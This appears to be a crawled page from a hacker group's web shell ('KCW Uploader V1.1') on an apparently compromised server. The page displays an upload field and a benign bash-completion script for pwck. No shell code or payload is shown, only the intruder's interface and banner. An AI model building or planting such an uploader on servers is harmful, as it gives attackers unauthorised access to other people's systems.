Kerala Cyber Warriors
KCW Uploader V1.1

Path : /usr/share/bash-completion/completions/
File Upload :
Current File : //usr/share/bash-completion/completions/pwck

# pwck(8) completion                                       -*- shell-script -*-

_pwck()
{
    local cur prev words cword
    _init_completion || return

    if [[ "$cur" == -* ]]; then
        local opts=$(_parse_help "$1")
        COMPREPLY=( $(compgen -W '${opts:-$(_parse_usage "$1")}' -- "$cur") )
        return
    fi

    _filedir
} &&
complete -F _pwck pwck

# ex: filetype=sh

-=[ KCW uplo4d3r c0ded by cJ_n4p573r ]=-
Ⓒ2017 ҠЄГѦLѦ СүѣЄГ ЩѦГГіѺГՏ